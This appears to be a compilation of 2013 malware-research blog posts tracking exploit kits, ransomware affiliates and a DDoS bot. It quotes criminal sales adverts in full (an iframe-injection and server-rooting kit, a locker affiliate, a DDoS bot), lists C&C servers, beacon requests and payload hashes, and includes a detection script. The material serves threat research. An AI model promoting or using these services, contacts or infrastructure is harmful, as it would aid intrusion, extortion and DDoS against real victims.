- многопоточный ифрейминг ваших фтп и вебшеллов — мы умеем работать со всеми популярными CMS (более трехсот), и вставляем ваш код самым оптимальным способом в любые виды скриптов. Вы можете быть уверены, мы не испортим верстку ни одной страницы, и вы получите максимум траффика с каждого аккаунта!
- приватные алгоритмы автоматической генерации и криптования ифрейм кода.
- проверка на наличие SSH доступа у всех аккаунтов фтп. Примерно 15-20% фтп имеют доступ по SSH, также можно чекать майл+пасс базы на наличие доступов по фтп или SSH.
- все аккаунты SSH проверяются нашими серверными эксплоитами на получение рута. С 10к аккаунтов SSH вы можете получить в районе 500 рутовых доступов к серверам! На руты устанавливается простой бэкдор для повышения прав при последующем доступе. Руткит в разработке.
- гибко настраиваемая система проверки на детекты АВ как кода ифрейма, так и доменов/ip доров, использующая все известные антивирусы. При детектах АВ автоматически перекриптовывается и заливается на аккаунты новый чистый код.
- заливка любых пользовательских скриптов с проверкой на работоспособность, заливка шеллов и массовое выполнение команд на них: ифрейминг/очистка, eval(), system(), информация о системе, ддос, и др.
- все действия с аккаунтами выполняются через socks-прокси. В качестве socks-прокси используюся SSH-туннели, поднимаемые на обнаруженных доступах SSH, или на аккаунтах, загруженных пользователем вручную.
- все поднятые на сервере socks-прокси можно использовать как на своём компьютере, так и на любых других разрешённых IP-адресах, таким образом обеспечивая себе дополнительную безопасность и анонимность в сети Интернет.
- встроенная TDS (гибкая система распределения и учета траффика), выдерживающая высокие нагрузки на уровне Sutra TDS.
- отключаемые jabber-уведомления
- и многое, многое другое.

Я отдаю себе отчет, что фтп аккаунты - это очень приватная вещь, и мы приложили максимум усилий, чтобы кроме вас никто не получил к ним доступ. Все исходные коды зашифрованы, все аккаунты в базе криптуются нашим собственным алгоритмом не поддающемуся брутфорсу. Ваш пароль используется в качестве ключа шифрования, в случае утери пароля даже мы не сможем расшифровать аккаунты из базы. Установка админки производится в truecrypt контейнер.
Всё это создает достаточную защиту ваших данных в случае любых непредвиденных обстоятельств.

Поддержка пользователей осуществляется почти 24 часа в сутки, 7 дней в неделю, несколькими специалистами. Софт постоянно улучшается, добавляется функционал по пожеланиям клиентов.

Версии софта:
Софт предоставляется в двух комплектациях - "Lite" и "Pro".
Версия Lite включает в себя базовый функционал для обработки FTP аккаунтов - фреймер FTP, TDS, проверка на SSH доступ, автоматика АВ - полноценный инструмент для работы с FTP.
Версия Pro, помимо функционала версии Lite, имеет дополнительные возможности - заливка скриптов на аккаунты, работа с веб-шеллами, проверка получения рута на SSH, инжектор ифрейма в SWF файлы, и другие.
В версию Lite новый функционал добавляться не будет, в обновлениях будут только исправления найденных ошибок. Новые фичи добавляются только в версию Pro.

Ценовая политика:
Лицензия на использование софта стоит 1500 долларов в месяц при покупке Pro версии, и 1000 долларов при покупке Lite версии. При оплате за год вперед скидка 50% (9000$ за Pro, 6000$ за Lite)
К этой цене необходимо прибавить стоимость сервера, вы можете заказать его у нас (цены начинаются от 150 долларов в месяц), или предоставить свой собственный сервер.

Видео о возможностях проекта: http://www.youtube .com/watch?v=DvDNob628F0

Мы принимаем Webmoney, Liberty Reserve, Perfect Money, Bitcoin
Зарегистрироваться и оплатить можно в автоматическом режиме на нашем сайте: https://sevska .com

Контакты(jabber):
Менеджер: manager@jabber.cx (поддержка продаж, заказ услуг, общие вопросы)
Саппорт: 31337@libpwn.so (тех. проблемы, администрирование серверов)

ЗЫ. Кроме этого напоминаю всем желающим, что по прежнему работает моя приватная партнерка по выкупу загрузок, даю ехе и стату, гружу только сокс, ни на чем не сказывается, можно паралельно с чем угодно грузить, по поводу продажи загрузок стучите мне в жабу jabber@honese.com

С уважением,
Пётр Севера
__________________
Jabber(XMPP): jabber @ honese.com
ICQ: 104967

--------------------------------------------
Translated by @Malwageddon - Thanks!
--------------------------------------------

Iframer "Tale of the North"

Good day,

My name is Petr Severa and I'm proud to present you my new product - IFRAMEr "Tale of the North". We spent a few years developing and improving this product and I can truly say - the legendary 'Cash' button is now available to everyone. The IFRAMEr is being used by a number of trusted people already and the feedback I receive is highly positive. Normally, the software of this kind is not publicly available and only used by a few chosen ones. Many who use "Tale of the North" already, tried to talk me out of going public with it, but after talking to other project partners and discussing all the pros and cons I've decided to do just that.

So, what is "Tale of the North"? As our lead developer likes to refer to it - it's not just an IFRAMEr, it's an operating system. So, "Tale of the North" is a multifunctional server software with an easy to use control panel.

Main functions:
- multithreaded iframing of your FTP and web shells - we can work with all popular CMS (over 300) and can insert your code into any script types. Don't worry, we won't screw your page assembly process and you will receive maximum traffic from your every account!
- private auto-generation and encryption algorithms for IFRAMEr code.
- SSH access check for all FTP accounts. Approximately, 15-20% of FTP have SSH access, also it's possible to check mail+pass databases for presence of FTP or SSH access.
- possibility of getting 'root' on all SSH accounts is checked by our server-side exploits. Out of 10K accounts you can get about 500 with server root access! A simple backdoor is installed on all 'root's to elevate the rights for subsequent access. A proper rootkit is in development.
- IFRAMEr code AV detections checking system with flexible settings, also checks domain names and IPs - using all known anti-virus products. If the code is being detected it's automatically re-encrypted and uploaded to accounts.
- support for user custom scripts upload with execution check, shell upload with support for mass commands execution: iframing/cleaning, eval(), system(), OS details, DDoS, etc.
- all account actions are done through a socks-proxy. SSH-tunnels are used for the socks-proxy - compromised SSH or user manually specified servers are used.
- all socks-proxy available on the server can either be used from your PC or any other allowed IPs providing you with additional security and anonymity on the Internet.
- built-in TDS(flexible Traffic Distribution System), capable of handling big loads on par with Sutra TDS.
- configurable jabber-notifications
- and more, and more other features.

I understand that FTP accounts are very private things and we applied maximum effort to protect them. All source code is encrypted, all accounts are stored encrypted in the DB using our own brute-force-proof algorithm. Your password is used as the encryption key and if it's lost even we can't decrypt your account details from the database. The admin panel is installed into a TrueCrypt container. All of it combined creates good protection for your data in any unforeseen situations.

Customer support is available almost 24/7 with a few specialists ready to answer your query. Software is constantly improved, new features can be added as per customer request.

Software versions:
Software comes in two versions - "Lite" and "Pro".
Lite version includes base functions for FTP accounts processing - FTP framer, TDS, SSH access check, AV automation - complete toolbox for working with FTP.
Pro version includes all the features available in Lite and some additional ones - script upload to accounts, web-shell interface, SSH 'root' check, iframe injector for SWF files, and other features.
No new functionality will ever be added to the Lite version; its updates will include only bug fixes. New features will be added to the Pro version only.

Prices:
Licence to use the software costs $1500 a month for Pro version and $1000 for Lite. 50% discount is offered when purchasing 12 months (9000$ for Pro, 6000$ for Lite)
You'll have to add the cost of a server to this price. You can either buy it from us(prices start at $150 per month) or supply your own server.

Video featuring this project: http://www.youtube .com/watch?v=DvDNob628F0

We accept Webmoney, Liberty Reserve, Perfect Money, Bitcoin
You can register and pay on our website: https://sevska .com

Contacts(jabber):
Manager: manager@jabber.cx (sales support, service requests, common questions)
Support: 31337@libpwn.so (technical issues, servers administration)

P.S. Also, I would like to remind everyone that my traffic purchasing private partner program is still active. I give EXE and stats, load SOCKS only, it won't affect anything, can be loaded with anything else. If you're interested contact me through Jabber jabber@honese.com

Regards,
Petr Severa
__________________
Jabber(XMPP): jabber @ honese.com
ICQ: 104967
--------------------------------------------

Here is the associated review in video (a copy in case the Original is being pulled out) :
http://www.youtube.com/watch?v=UU6MCPbZCus

Thanks @Xylit0l for multiple hints in that story.

Read more :
Active CookieBomb, CVE 2013-2465 and Reveton - Giuseppe `N3mes1s` - Quequero.org
Crumbling to the Cookiebomb - 2013-08-28 - Martin Lee - Cisco
CookieBomb still dropping malicious content - 2013-08-15 - Krishnan Subramanian - Zscaler 
Proof of Concept of "CookieBomb" code injection attack - 2013-07-17 - @unixfreaxp - Malware must die!
Underground [RU] : https://damagelab.org/index.php?showtopic=24376 <- Detailed review by Ar3s

Flimrans Affiliate : Borracho



In the middle of May a new ransomware appeared (or at least was spotted), pushed in a new exploit kit named Flimkit by Chris Wakelin.

Flimkit pushing Flimrans
Encoded Payload in the Jar
404 Call back for stats

Both were tightly tied together, as Kore/Urausy were, or in a less obvious way Cool EK/Reveton.

The ransomware got referred to as: Flimrans

Nothing really new in the clothes... Same designs as the ones used by Urausy back in September 2012
Flimrans Design 2013-05
(match Urausy 2012-09)
In the middle of June it seems that the group switched to Styx

Styx Pushing Flimrans
2013-06-12
(same infection chain that we could see previously in Flimkit)


Then it seems they moved (or just went public?) to affiliate mode, as early as mid-July

Advert posted on 2013-07-10
for a locker in affiliate mode
-----------Text of the Advert -----------
Locker
- Stable callback and conversion rates
- Many countries
- Any cooperation model on the checks (NOT FOR SALE, cooperation only!)
- The necessary set of tools is available
- and more...

PM only

-----------------------------------------------

- Stable installs rate and conversations
- A lot of Countries
- Choose your business model for Partnership
- We have all needed for work
- and more...

PM Only
----------------------------------------------
A few days later, some numbers:

Update to Initial Advert
------------------------------------------------------------------------------------------------
I'll post a few lines on conversions from various traffic sources and themes

Columns: Installs | Checks(MP/Ukash/PSC) | Valid(MP/Ukash/PSC) % | Pending/Bad | Total ratio/Valid ratio | Money

Adult traffic sourced from traffic exchanges

Mix US/EU - 40/60%
27339 955 (334/114/507) 694 (194/93/407) 72.67 % 0/261 1:28 / 1:39 $ 39799

Pure US
19599 584 (580/1/3) 340 (337/1/2) 58.22 % 0/244 1:33 / 1:57 $ 33920

Mix US/EU - 50/50%
12955 328 (207/37/84) 223 (136/25/62) 67.99 % 0/105 1:39 / 1:58 $ 17345


Non Adult traffic sourced from traffic exchanges

Mix US/EU - 50/50%
22337 239 (103/39/97) 150 (55/31/64) 62.76 % 0/89 1:93 / 1:148 $ 9592

Pure US
8787 139 (136/2/1) 74 (71/2/1) 53.24 % 0/65 1:63 / 1:118 $ 7352

--------------------------------------------------------------------------------------------------

Note: Adult/Non Adult is a distinction made on the source of the traffic (porn or not).

Strangely, it's only in the last three weeks that we are seeing more and more of it.
Mainly pushed in Sweet Orange

Flimrans Pushed in Sweet Orange
2013-10-03 - Fiddler at the end.


but also in that new HiMan Exploit Kit.

Flimrans pushed in HiMan EK
2013-10-02
What's behind the curtains ?

Borracho.biz - Flimrans Affiliate Entrance
borracho.biz
109.235.49.64
47869 | 109.235.48.0/21 | NETROUTING | NL | EXNW.COM | NETROUTING TELECOM

Borracho - News

New filters! 2013-09-14 | 20:15
For those sending traffic to our exploit: besides the block on all countries except the list below, filters on browser and OS have been added.
Accepted OS:
Seven, XP, 98, 95, Vista, Eight

Also, for now only the IE browser is accepted.
Country block | Exploit Countries Blocked. 2013-08-03 | 16:04
For those sending traffic to our exploit, it currently accepts only these countries:
AR CA DA FR IT NO SE AT CH DE GB LU NZ SI AU CR ES GR LV PL SK BE CY EC HU MX PT TR BO CZ FI IE NL RO US
All other countries are blocked and not counted!

Who send to our exploit, please send only these countries:
AR CA DA FR IT NO SE AT CH DE GB LU NZ SI AU CR ES GR LV PL SK BE CY EC HU MX PT TR BO CZ FI IE NL RO US
All other countries will be blocked and not counted!

Note: I think "our exploit" was Flimrans and they are now handing out Sweet Orange threads.

Sweet Orange Stats tied to a Thread pushing Flimrans.
Beginning of October 2013

Borracho - Money Stats

Borracho - Referral
It seems you can get "help" with the distribution (see "Files" below) and get stats for this "sub-affiliate".
It's only an assumption; I didn't see it live.

Borracho - Config
Note that the "lock" function delay can be set independently by each affiliate member and changed any time they want. This function allows a less obvious connection between the infection source and the locking for victims, and can also help bypass some analysis environments.

Borracho - Checks
Vouchers are received by the affiliate operator, checked, then a % is shared with members.
Yes... people are still falling for ransomware...

Borracho - Files
Each time you download you'll get a fresh file. The file is tied to the account ID, but the parameter behind the GET seems to allow you to create a "sub-affiliate" and see how successful the distribution is in "Referral" and "Money Stats".

Borracho - Profile
Borracho - Payments
I made a time-consuming design-grabbing session. The only new things at that time were:

Default Design (if country not targeted - it's also one of the multiple Reveton US design)

Flimrans "Failover" Design

US Design (it's also one of the Reveton US design)

Flimrans US Design - 2013-10
ES Design (this is something new to me)

Flimrans ES Design - 2013-10

C&C: (c&c moved since HiMan EK post)
192.133.139.249
50245 | 192.133.136.0/21 | SERVEREL | US | SERVEREL.COM | SERVEREL

GET /xfczMgBpgmeyU1Xf3MxFA0jxz3aVLa4= HTTP/1.1
Host: opobokuku.de
Cache-Control: no-cache


<edit1 2013-10-09>
Borracho moved or down just after publication of the post.

Flimrans C&Cs:
85.25.84.201 (cf af3750a4623d25c67b911562b99a9ee3 for instance)
8972 | 85.25.0.0/16 | PLUSSERVER | LI | INTERGENIA.DE | INTERGENIA AG

GET /tyjCGcRuh2eyU1Xf3MxFA0jxz3aVLa4= HTTP/1.1
Host: opobokuku.de
Cache-Control: no-cache
--
Host: ydomolyne.de (2013-10-14)
--

198.27.109.127
16276 | 198.27.64.0/18 | OVH | CA | OVH.COM | OVH HOSTING INC.

</edit1>

Files :
Here (Owncloud via goo.gl)
(2 SWO fiddler - 2 Anubis Cloud Analysis - 4 samples)

Late Disclosure - Darkleech Actors /Home/ - some numbers



To illustrate a post to come on the Blackhole transition, here are some numbers for the /home/ aka q.php Blackhole, aka the Darkleech-fuelled one.

Note: the Darkleech module filters on user-agent. Infection is tried only on IE (so Opera/Mozilla and others are researchers, honeyclients, etc.). Then Blackhole also filters on IE (so 0 infections for others).


Note: thread name, number of loads.
Browser filter on the Blackhole side too.
Last number I was able to see: > 2 800 000 infections.

File : q.php = Pony - Thread mod1
Lock : a.php = Nymaim.a - Thread adult (inactive since December)

They were pushing Pony which was then (depending on your country) pushing Urausy or Nymaim.b (which itself was loading Zaccess or Nymaim.a ransomware). Sébastien Duquette from Eset wrote a nice post about that.


Nymaim.A - Urausy Variant
with B&W Zoo/CP images
(Careful : this design has also been used by Bomba Locker)





Nymaim.A -US Design


2013-04-09 - 20:17 (RU Time) - 31081 infections in 20 hours

q.php Blackhole - 2013-04-09 - 20:17 RU Time
Note the thread name : mod1

2013-04-09 - 21:07
(numbers since Monday, the day before, i.e. 45 hours)



2013-04-11 - 22:22 - 29398 infections in around 22 hours

q.php Blackhole - 2013-04-11 - 22:22 RU Time


2013-04-12 - 20:29 - 26319 infections in 20.5 hours
q.php Blackhole - 2013-04-12 - 20:29 RU Time

Note: the Reveton group was doing as well as this (at least in Oct/Nov 2012) with Cool EK

Read more :
There is a huge number of posts about this group, so I made a selection.
Dissecting FireEye's Career Web Site Compromise 2013-09-18 Dancho Danchev
The Home Campaign: overstaying its welcome 2013-07-02 Sébastien Duquette - Eset
The Evil Came Back: Darkleech's Apache Malware Module - 2013-03-24 -Hendrik Adrian - MalwareMustDie
1940 IPs for a BHEK/ULocker server - Nexcess-Net - 2012-09-14 

Post Publication Reading :
Nymaim: Browsing for trouble - 2013-10-23 - Jean-Iain Boutin - Eset

Paunch's arrest...The end of an Era !


Snapshot of:
Spin up of a Supermassive Black Hole 
Illustration Credit: Robert Hurt, NASA/JPL-Caltech


Note: This post is a work in progress. Not all groups have transitioned, so I will update it (if I am able to spot them again) and add links to significant external posts.
Disclaimer: I do not have the telemetry an antivirus or IDS vendor can have... for sure we could have a better picture than this.


If you are reading this you already know that Paunch, the coder behind Blackhole, has been arrested.


What I will try to cover here is the transition/impact of this on the groups using the Blackhole/Cool EK weapon:
the evolution of what I can see from the "driveby battlefield".

The Actors :


Here are the main groups I am aware of who were using Blackhole or Cool EK at the time of the arrest. I will describe the distribution and the threats but won't talk (maybe only for now) about the way they handle the whack-a-mole with the defense (domains, IPs).

- "Reveton Team" or "Mr.J/MonsterAV" : Cool EK lately on tcp 1024


Cool EK "Reveton" - 2013-10-07 01:37
First customer of Cool EK. I would say their golden age was 1 year ago. They were infecting more than 30k machines a day with Reveton when Cool EK was released (stats were easy to gather).

Distribution : Traffic coming from multiple sources including lately CookieBomb ("Tale of the North" Iframer)
Threat : Mainly Reveton (some Live Security Professional?). Hundreds of samples a day. Around 30 threads.

- One Urausy affiliate member (or BestAV itself??) : Cool EK /index.php?p=

Cool EK "Urausy/FakeAV"& Urausy Calling Home
2013-10-04 07:00
Distribution : From what I saw mainly Porn Malvertising and few compromised websites.
Threat : Urausy / Fake AV. See: The missing link - Some lights on "Urausy" affiliate 2013-05-29

- Home Gang  (or q.php or Darkleech fuelled) :

/Home/ Blackhole - 2013-09-30
Distribution : Traffic from Darkleech Module (installed on compromised server via Cpanel/ Parallels Plesk vulns)
Filtering IE only both on the Darkleech Side and on the Blackhole itself.
Threat : They were pushing Pony which was then (depending on your country) pushing Urausy or Nymaim.b (which itself was loading Zaccess or Nymaim.a ransomware). 1 thread, around 30 rotations a day.

See : Late Disclosure - Darkleech Actors /Home/ - some numbers 2013-10-10 (more reading there)

- Ex-Tkr  /i/last blackhole (or CDorked.A Fuelled) :


Ex-Tkr Blackhole Pushing Carberp.J (MS) aka Glupteba.G (Eset)
2013-09-16
Distribution : As far as I know, mostly the CDorked.A module installed on servers running compromised Cpanel/Parallels Plesk, and some fake porn websites
Threats : 3 threads, 2 payload families: Carberp.J (200ko) and Leechole (50ko)
More than 240 samples a day (15-20 for Carberp and around 110 for each Leechole).

See: Linux/Cdorked.A malware: Lighttpd and nginx web servers also affected 2013-05-07 Marc-Etienne M. Léveillé 2013-07-05

- /closest/ Blackhole :

BH EK Closest pushing the STI (pay per install clickfraud) Payload
2013-09-26

Distribution : Lately, mainly LinkedIn spam redirecting to some compromised wordpress.
Threats : Zaccess, Cutwail, STI (Pay Per install clickfraud affiliate tied to Zaccess). They pushed some Cridex in the past too.

- /topic/  - Zeus Game Over gang :

This is the blackhole with the highest number of threads. Not sure it can be operated by only one guy. Or he must be really well organised !

/topic/ BH EK pushing  2 payloads (ZGO & Dipverdle (a loader) )
2013-09-30
Distribution : Many compromised website (OT: they are also working a lot by mail attachments)
Threats : More than 60 threads. More than 2000 rotating samples a day.
 The main activity is pushing Pony (different for many threads) as a loader for ZeusGameOver.
But we could see also : Medfos, MagicTraffic (PPI ClickFraud tied to Zaccess), some fakeav, even Kovter Ransomware.

- /ngen/ Blackhole

/Ngen/ Blackhole pushing Citadel (you can see the call home : /ckt/ ) and Zaccess
2013-09-11
Note the duqu like front drop (shrift.php - CVE-2011-3402)
Distribution : A lot of compromised website with a TDS sharing (hosted with?) the infrastructure of the Blackhole. (/sword/in.cgi may remind you things)
Threats : Shylock, Zaccess, those day (but some Sinowal, Ursnif, Zbot, Citadel in the past too)

- /xlawr/ Blackhole

/xlawr/ Blackhole pushing FakeRean
2013-09-27
Distribution : mainly compromised websites.
Threats : 2 threads around 50 samples a day: Zaccess and FakeRean 855ko

- Customer "hosted 1" in Rented mode (will cover the main based on traffic amount and longevity).


Distribution : Compromised website, 2 step (with a js on another compromised site as TDS)
Threat : 1 thread, 3 payloads (I didn't try to identify them for now - will do).


- /news/ Blackhole

/news/ BH EK pushing Zeus Game Over
Distribution : mainly via spam (lately related to Pinterest)
Threats : fast rotating thread...hard to follow. Lately pushing ZeusGameOver
But in the past they were pushing Cridex/Bugat, or Inlev.B gathering Tesch.A (Zaccess?), or Ursniff
Some of their domains : bbb-complaints.org, pinformer.net, cool-mail.net
They are not new in the business : http://blog.dynamoo.com/2012/06/wire-transfer-hp-spam-and.html
Some Urlquery traces

- /vague/ Blackhole

This blackhole was hard to find. It was the infector for the Citadel /ppp/ that made some noise for being Japan and Germany focused.


I won't talk about the /adfasdfksjdfn/ Sinowal BH EK (while still reachable, it's not in use anymore), nor the white/purple Cool EK which is blinking (and quite surely built on a leak of Cool EK code), nor the /reveals/ or /news/ Blackhole (except if I spot the groups after transition).

That day: 2013-10-07



This was ground breaking for me...Seeing the source that could only be true.
That really sounds like....malware now need coffee ...or anxiolytic.

I tried to find some kind of evidence.

I knew it was up a few days earlier because I gave it a visit again after the "Expanding Business: JavaScript Cryptor Offered by Author of Blackhole Exploit Kit" post from Fortinet (2013-10-01).

Two hours after the tweet, the underground started to react.

Verified :


Verified - Cleaning Mode 2013-10-07
A few hours after the tweet went viral.

Exploit .in :

Paunch Blackhole forum thread :
Removed.

Paunch renamed


I also noticed that "Sweet Orange" account was active (trying to get some news I guess).
Nuclear Pack was no longer on either of these forums but still on darkode.

Neutrino Author's reaction :
Price increase for non Russian customers to 10k/month
<edit:2013-10-11>Now 1 000 000$ per month - See advert here : http://pastebin.com/raw.php?i=6xZDGadQ </edit>

Since then we can see some actors trying to reach Paunch's associates in Cool EK or find new solutions

"I wish Paunch courage and a quick resolution of his problems, but no matter what, we still have to work"
that means something like :
"I wish Paunch courage and quickly solve the problem, but no matter what we need to work"

or

"Guys, if anyone worked with Paunch on the private exploit kit project, let me know. I'm one of the clients."
that can be translated as :
"Guys, if anyone has worked with Paunch for a private Exploit Kit project - let me know. I am one of the clients."

That same day I tried to take a "photo" of the battlefield state (visiting each of the exploit kits illustrated here)

2013-10-07 - between 2 and 3 hours after the news went viral
What can we see: the rented Blackholes are already out.
The Darkleech/Home one is also 502ing.
(I was wondering if the operators are not part of the "partners" mentioned in the tweet.)
ALL exploit kits are using an almost 4-day-old Jar.
In fact that's a simplification, since there are 3 jars (depending on your config), which are:

3bebb777a0b3e7d416a6327a4777b630 - CVE-2013-2465
c61923eb060b42b6d27373b2d44e7839 - CVE-2013-2460
3478966161745cf3401b2a534523a4bc - CVE-2013-0422


And guess what? You still can't find a newer one on Blackhole.
Just now :

Sploit folder state in one of those blackhole.
2013-10-11

The Transition :

- "Reveton Team" or "Mr.J/MonsterAV" : 

The redirector linked to the "Tale of the North" iframer restarted the redirect only 5 hours after the tweet, sending traffic to Whitehole.

2013-10-07 5 hours after the tweet
Reveton team has already switched to WhiteHole
That was a weird move knowing the conversion rate of this exploit kit.
And it did not take long.

The day after, the group was moving again. And what I thought was a Whitehole mutation was more of an intermediate state (to avoid losing traffic?):

Reveton team transitioning from WhiteHole (tcp 2780) to ....
Something new on tcp 80 - 2013-10-08
Pro transition! No interruption.
And here is the Reveton group in its state today:

Angler EK pushing Reveton
2013-10-08
I won't make a full post about what we will call Angler EK. A one-Jar exploit kit for now.
The payload is XORed with a key easily found on the landing page. No JSdetect. For sure it's an emergency solution.

Why Angler EK? Because we can't name this a Monster EK.

Advert for Reveton/Live Security Pro Distribution
(nice Angler Fish ! )
Files:Angler EK Fiddler (owncloud via goo.gl)


- Ex-Tkr  /i/last blackhole (or CDorked.A Fuelled) : 

Reading this : Close encounter with Linux/Cdorked.A - Kimberly 2013-10-13 - Stopmalvertising
It seems this group has moved to Neutrino (>> Seems like those guys talk Russian :) ). Same infection source (compromised websites with CDorked.A, same TDS and domain pattern).

Thanks Kimberly for the solid Referer 

Ex-TKR Neutrino Thread 2013-10-14
Pushing quite surely Carberp.J/Glupteba.G
Payload:  95ffc438836b4bddb4d85faebde775cd 260ko...Should be Carberp.J/Glupteba.G
One more : 0622efb24e8436d50d14f387fdb31fac

And one more pass (from FR to get the Leechole)

Ex-TKR Neutrino Thread 2013-10-14
Pushing maybe Leechole
Payload : feb4dd00e920170c0d0320ab170c83fa 100ko Should be Leechole.

But the calls are slightly different (an upgrade? something else?):
-----C&C-----
144.76.84.132 tcp 8000
GET /stat?uptime=100&downlink=1111&uplink=1111&id=0002D9BC&statpass=bpass&version=20131011&features=30&guid=4c59a191-ced9-40d6-887f-1c2d0668a4a6&comment=20131011&p=0&s= HTTP/1.0
(via  Joe Sandbox Cloud )
-----------------------
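Added example (not code from the post): a log-side check that flags the /stat check-in quoted above. The parameter names come from the captured request; the proxy log lines are constructed.

```python
"""Flag the GET /stat?... check-in seen in the Ex-TKR Neutrino payload traffic.

Added example, not from the original post. It matches on the full parameter
set of the captured request line (uptime, downlink, uplink, id, statpass,
version, features, guid, comment, p, s) rather than on a single value, so a
benign /stat endpoint with one overlapping key does not fire.
"""
from urllib.parse import urlsplit, parse_qs

# Every query key present in the captured beacon; all must be present to match.
STAT_BEACON_KEYS = {
    "uptime", "downlink", "uplink", "id", "statpass",
    "version", "features", "guid", "comment", "p", "s",
}


def parse_request_line(line):
    """Split 'METHOD target HTTP/x.y' into a tuple, or None if malformed."""
    parts = line.strip().split(" ")
    if len(parts) != 3 or not parts[2].startswith("HTTP/"):
        return None
    return parts[0], parts[1], parts[2]


def match_stat_beacon(request_line):
    """Return the identifying fields of a matching beacon, else None."""
    parsed = parse_request_line(request_line)
    if parsed is None:
        return None
    method, target, _version = parsed
    if method != "GET":                      # the captured beacon is a GET
        return None
    url = urlsplit(target)
    if url.path != "/stat":
        return None
    # keep_blank_values so the empty trailing '&s=' still counts as present
    params = parse_qs(url.query, keep_blank_values=True)
    if not STAT_BEACON_KEYS.issubset(params):
        return None
    return {k: params[k][0] for k in ("id", "guid", "version", "statpass")}


def scan_log(lines):
    """Run match_stat_beacon over lines of the form 'src dst:port REQUEST-LINE'."""
    hits = []
    for line in lines:
        try:
            src, dst, request = line.split(" ", 2)
        except ValueError:
            continue                          # not a log line we understand
        fields = match_stat_beacon(request)
        if fields:
            hits.append({"src": src, "dst": dst, **fields})
    return hits


# Constructed sample log: the first request is the one quoted in the post,
# the other three are benign lookalikes that must not match.
SAMPLE_LOG = [
    "10.0.0.5 144.76.84.132:8000 GET /stat?uptime=100&downlink=1111&uplink=1111"
    "&id=0002D9BC&statpass=bpass&version=20131011&features=30"
    "&guid=4c59a191-ced9-40d6-887f-1c2d0668a4a6&comment=20131011&p=0&s= HTTP/1.0",
    "10.0.0.6 203.0.113.9:80 GET /stat?uptime=100 HTTP/1.1",
    "10.0.0.7 203.0.113.10:80 GET /stats?id=1&guid=abc HTTP/1.1",
    "10.0.0.8 203.0.113.11:80 POST /stat?uptime=1&downlink=1&uplink=1&id=1"
    "&statpass=x&version=1&features=1&guid=g&comment=c&p=0&s= HTTP/1.1",
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```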

Files:  3 payloads (Owncloud via goo.gl) Would love any feedback on those samples.

- /news/ Blackhole
They are back on Magnitude. By mail again (pinterest stuff).

/news/ Blackhole operators are now on Magnitude
2013-10-16
Three payloads pushed via recently integrated CVE-2013-2551
Here :
ebfe57976c5840a578dd60f997418689  Zaccess
c4d71b94cfe3adbba8f43d927a0d8a0f MS: Inlev.?
35a613825af980eb1010e8462d5acc1d ZeusGameOver

From US same pass dropped me a 4th Payload which was : aa0f08a3fab179a071b1576fd3755a8e (Tesch.B)

Files:  3 payloads (Owncloud via goo.gl) Would love any feedback on the first two samples.
See also : Cutwail Spam Swapping Blackhole for Magnitude Exploit Kit 2013-10-18 - Dell Secureworks CTU

- /vague/ Blackhole : 

They moved to Nuclear Pack. Here in action:

Nuclear Pack (rejecting non JP traffic) pushing Citadel
2013-10-27

Payload : d6ed9120d489227c7195cb792581f068


- Home Gang  (or q.php or Darkleech fuelled) :

No Exploit Kit spotted for Now
Nymaim: Browsing for trouble - 2013-10-23 - Jean-Iain Boutin - Eset

- /topic/  - Zeus Game Over gang :

No Exploit Kit spotted for Now
ZGO keeps spreading via mail attachments (source: Dell SecureWorks), now using Upatre.
Read: Upatre: Another Day Another Downloader Brett Stone-Gross and Russell Dickerson - 2013-10-04


--- Blackhole still receiving Traffic 2013-10-11 ---
/closest/
/ngen/
----

--- That's all folks. For now ---

---------------------------------
If you have any intel, information, question about this, I'd love to hear about it. kafeine@dontneedcoffee.com
---------------------------------
Clarification: I did not contact Media as it is written here or there. I only replied to questions I received in my mailbox following some tweets (please consider it before thinking : "Media Whore").

PS  : Sharing is part of our defenses. Crediting is part of the trust/sharing process. You can freely use data from here but please, don't be a douchebag, credit your source. Each time I see/read/hear someone bragging with data he easily gathered here (without crediting)... the idea "stop the share""pop" in my mind.



Meet Madness Pro or Few days rise of a Ddos Botnet


At the beginning of September I landed on a new instance of Cool Exploit Kit: /paper/

Cool EK pushing Dipverdle, which then calls home and gathers
Madness (sometimes no analysis needed ;) ) DDoS bot
Dipverdle (MS name) was new to me. I spent time studying the server and I have the feeling that the C&C side is a fork of a ransomware C&C. (Supposition: the global picture makes me think Dipverdle could be tied to FretLine, the author of MultiLocker, then MultiBotnet.)

Dipverdle : 01a08386464149fab0c05e24dc4b64ad
User-Agent: Mozilla/5.0 (Windows NT 5.1)

Madness : 3e4107ccf956e2fc7af171adf3c18f0a

Samples here (Owncloud via goo.gl)

The Dipverdle C&C relies on an SQLite database.

Dipverdle C&C DB structure
Dipverdle DB with some content

Feeding Splunk with this database :

16 000 C&C 1st calls in (chosen) 4 days
Dipverdle C&C 1st call in (chosen) 4 days




The Madness C&C :

Madness C&C Login Screen
This was really familiar...

Darkness (Optima) C&C Login Screen - 2012-06-23
See : A peek inside the Darkness (Optima) DDoS Bot - Dancho Danchev - 2012-03-08


Screenshot of the Advert
Original Text :
------------------------------------------
Madness PRO

Release date: 01.09.2013

Background:
In summer 2012 we started thinking about building a fundamentally new DDoS bot for testing our own web resources for fault tolerance, since none of the systems we tested deserved even a "4".
During testing the samples ate memory, loaded the CPU of the local machine, crashed with errors, hung at 50% CPU load, wrote incorrect registry entries, triggered protection systems, and many serious bugs were found in the control panels.
To build our own system we studied in detail: BlackEnergy (source code), gbot (disassembly), DirtJumper (disassembly), Darkness Optima (source code, purchased under contract), iBot (source code, purchased under contract), w3Bot (source code); the source code of Zeus and of many programs from adjacent scenes was also studied.

Features
- written in C++, easy to crypt, small size (packed sample < 15 KB)
- full compatibility with all Windows of the NT family (x86 and x64)
- the bot has 7 attack types
- stable in the system. CPU and RAM load figures are very even.
- does not attract the attention of UAC and Windows Firewall
- can set port, referer and cookies individually for each target
- supports up to 10 targets simultaneously
- very low CPU load thanks to a new, elaborate command parsing scheme (in all comparable bots the parsing happens inside the function, in many threads, which loads the processor with extra work. The new bot stores all data in an array before the attack starts and the function receives ready-made parameters: address, port, referer, etc.)
- enormous output: more than 1500 HTTP (and more than 30 000 UDP) requests per minute thanks to direct interaction with the network drivers, even on desktop Windows! (only when using WinSock). That is about 10 times more than some comparable bots and somewhat more than the best competitors (by this metric).
- the control panel shows: requests per minute, privileges in the system, system version.
- supports bypassing CloudFlare protection (!!!) and many other, simpler ones.
- supports Slow GET and Slow POST modes!
